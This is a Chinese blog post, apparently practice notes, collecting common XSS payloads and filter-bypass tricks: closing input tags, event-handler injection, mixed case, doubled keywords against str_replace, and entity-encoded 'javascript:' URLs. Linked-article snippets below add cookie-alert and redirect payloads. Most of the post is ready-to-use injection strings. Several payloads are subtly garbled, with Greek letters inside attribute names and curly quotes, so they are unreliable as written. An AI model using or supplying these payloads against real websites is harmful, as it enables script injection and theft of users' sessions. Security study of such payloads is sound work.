常用xss

最新推荐文章于 2024-07-24 14:41:00 发布
最新推荐文章于 2024-07-24 14:41:00 发布
阅读量959 收藏 2
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pro20/article/details/106185975
版权

简单型Xss

‘xss就是在页面上执行你想要的js’

带<input> 标签的型xss需要闭合参数才能进行注入。

"><script>alert(1)</script>test

"><img src=! οnerrοr=“alert(/xss/)”>

<a href="" οnmοuseοver=“alert(/xss/)”>xss</a>

"><img src=“javascript:alert(/xss/)”> //浏览器可能会过滤这个

"><a href=“javascript:alert(/xss/)”>xss</a>//浏览器可能会过滤这个

如果输出点做了htmlspecialchars()转义成HTML实体,尝试看双引号和尖括号和单引号是否过滤,没过滤哪个用哪个。

(搜索框触发机制)

'οnclick=‘javascript:alert(1)’

’ οnmοuseοver='alert(/xss/)

"οnclick=‘javascript:alert(1)’

'><script>alert(1)</script>wait

" οnfοcus="alert(/xss/)

注意:onclick 和 onmouseover 需要点击输入框 才可触发payload.

strtolower():会把提交的所有字符转换为小写。(大小写绕过就不能用)

如果<script>被过滤,逃出input标签需要换标签。

"><a href=“javascript:alert(/xss/)”>xss</a>

只过滤了关键字,未有strolower()函数

则可使用大小写绕过。

"><sCript>alert(/xss/)</sCript>

在input标签中触发XSS:" ONmouseover="alert(/xss/)

str_replace():以其他字符替换字符串中的一些字符(区分大小写)。

"><scscriptript>alert(/xss/)</scscriptript>

" oonnmouseover="alert(/xss/)

将字符转换为小写,然后过滤特殊字符和双引号,最后又加了一个转义函数输出,所以按常规方法绕几乎不可能成功。这时可以考虑用协议绕过:javascript,alert,script被转换,可以考虑用编码代替:

javascrip&#116;:alert(/xss/)

javasc&#114;ipt:alert(/xss/)

javasc&#x0072;ipt:alert(1)

树根or树枝
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java过滤XSS脚本攻击记录一下
qq_41665452的博客
05-11 2511
背景 之前公司信息安全部门对公司项目进行网络安全升级时,发现项目里可能会出现XSS脚本攻击漏洞,所以就需要对其参数进行过滤拦截。 XSS 百度百科:XSS攻击全称:cross site scripting(这里是为了和CSS区分,所以叫XSS),跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。攻击者可以使用户在浏览器中执行其预定义的恶意脚本
XSS攻击的简单过滤和绕过
caoxinjian423的博客
09-02 3354
一、常见的XSS攻击脚本 弹窗警告 <script>alert('XSS')</script> <script>alert(document.cookie)</script> 页面嵌套 <iframe> src=http://www.baidu.comwidth=10 height=10 border=10 </iframe> 重定向 <script>window.location="http://www.b.
常见的7种XSS
weixin_30443075的博客
04-15 189
1. URL Reflection 当URL以某种方式反映在源代码中时,我们可以添加自己的XSS向量/有效负载。对于PHP页面,可以使用斜杠字符(/)在页面名称之后添加任何内容 http://brutelogic.com.br/xss.php/”><svg onload=alert(1)> 需要使用前导标记(“>”)来突破当前标记,以便插入新标记 2...
XSS学习总结
bcbobo21cn的专栏
06-21 2290
XSS攻击常识及常见的XSS攻击脚本汇总 一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现 了不被预期的脚本指令并执行时,XSS就发生了。 这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。 二、XSS有什么危害? 当我
XSS攻击全面解析:三种常见类型与防范策略
最新发布
hljdengbaoceping的博客
07-24 283
跨站脚本攻击(Cross Site Scripting,简称XSS)是一种安全漏洞,攻击者利用网站对用户输入内容的过滤不足,注入恶意脚本到网页中,当其他用户浏览这些页面时,嵌入的脚本会在他们的浏览器上执行,从而盗取cookie、会话令牌或进行其他恶意操作。二、反射型XSS(Non-Persistent XSS)定义:反射型XSS不像存储型那样持久存储恶意脚本,而是通过URL参数传递,用户点击含有恶意脚本的链接后,脚本随页面内容一起返回并在用户的浏览器上执行。对所有不可信的输入数据进行适当的输出编码。
常用xss收集
ciganqi8046的博客
11-14 1110
<script>alert("dddd")<script> <script>alert('test')</script> ----------------------------TOM-------------------------...
XSS攻击原理及常见的XSS攻击
weixin_47218056的博客
09-25 6341
一、什么是XSS攻击? XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击。XSS的重点不在于跨站点,而在于脚本的执行。那么XSS的原理是: 恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的。那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 二、反射性X
XSS
qq_25956141的博客
01-21 1195
1.常见XSS漏洞1--get请求回显漏洞  当我们的网页使用的是get请求的时候,服务器后端将get请求的字符串编码(在浏览器上使用的是encode编码)回显到页面的时候, 如果我们输入的是正常的一段字符,那么,他显示的是一段字符,然而,如果我们输入的是一段html代码呢???那么回显的就是一段html代码,当你的页面允许这样的时候,那么就要注意了,别人可以在你的链接上面加很长一段自己的
常用XSS检查语句
11-09
以下是一些常用XSS检查语句: 1. **基本的HTML注入测试**: ```html <script>alert('XSS'); ``` 这个语句会在用户的浏览器上弹出一个警告对话框,显示"XSS"。如果这个字符串未经过滤或转义,就可能被插入到...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
xss源码(常用站源码附安装教程).rar
03-10
"xss源码(常用站源码附安装教程).rar" 文件包含了用于研究和学习XSS攻击的平台源码,以及可能的安装教程,这对于理解XSS工作原理、防御策略以及进行安全测试非常有帮助。 1. XSS攻击类型: - 存储型XSS:攻击者将...
XSS(跨站脚本攻击) - 常用代码大全
热门推荐
CHK的博客
08-20 5万+
XSS(跨站脚本攻击) - 常用代码大全: 1'"()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;prompt(915149)&lt;/ScRiPt&gt; &lt;svg/onload=alert(1)&gt; &lt;script&gt;alert(document.cookie)&lt;/script&gt; '&gt;&lt;script&a
XSS总结
mingyqf的博客
04-09 861
转至:https://xz.aliyun.com/t/4067 By七友 / 2019-02-16 09:42:00 / 浏览数 38056 安全技术 WEB安全[顶(6)](javascript:) [踩(1)](javascript:) 简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的
XSS函数研究
shy的博客
03-12 1214
1,使用htmlspecialchars()函数将特殊字符转换为HTML实体 <?php $name=$_GET["name"]; $name=htmlspecialchars($name); ?> <input type='text' value='<?php echo $name?>'> 被转换的预定义的字符有: &:转换为&amp...
xss基础知识
土拨鼠挖洞中的博客
10-03 5342
  XSS 概述 指攻击者利用网站程序对用户的输入输出过滤不足,导致恶意代码在页面执行,对受害者造成cookie资料窃取、会话劫持、钓鱼欺骗等危害;     XSS危害 1.网络钓鱼,盗取各类用户的账号,如机器登录帐号、用户网银帐号、各类管理员帐号; 2.窃取用户Cookie,获取用户隐私,或者利用用户身份进一步执行操作 3.劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、...
XSS专栏之常见xss--总结备忘
键盘的起始页
02-25 1058
开始总结一些xss的想法。
xss注入
qq_63267612的博客
07-03 1491
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户目的。 XSS危害:XSS分类测试管理界面是否存在XSS: 在用户名框中输入">(闭合input标签) 结果,界面弹窗,证明该系统存在XSS注入 上一步验证得出,该页面存在XSS漏洞。接下来针对该漏洞
怎么使用input执行xss攻击_XSS场景及修复方案总结
weixin_32562973的博客
01-16 4646
xss原理跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意javaScript代码,当用户浏览该页之时,嵌入其中Web里面的javaScript代码会被执行,从而达到恶意攻击用户的目的。xss分类反射型存储型DOM型xss场景和防御1. 恶意数据出现在标签内<body> ...恶意数据 </body>漏洞代码Strin...
xss常用payload
11-25
以下是几种常用XSS Payload: 1. 弹窗XSS Payload: ```html <script>alert('XSS') ``` 2. Cookie劫持XSS Payload: ```html <script>document.location='...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值